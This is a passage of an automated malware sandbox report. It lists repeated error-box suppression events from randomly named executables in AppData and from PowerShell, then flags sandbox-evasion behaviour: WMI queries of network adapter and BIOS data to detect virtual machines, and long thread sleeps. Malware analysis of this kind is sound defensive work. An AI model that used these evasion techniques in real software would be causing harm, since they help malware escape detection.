              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 2056Thread sleep time: -23058430092136925s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 1304Thread sleep count: 9668 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3232Thread sleep time: -12912720851596678s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5364Thread sleep count: 9210 > 30
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -7378697629483816s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1200000s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1199812s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1199514s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1199359s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1199233s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1199106s >= -30000s
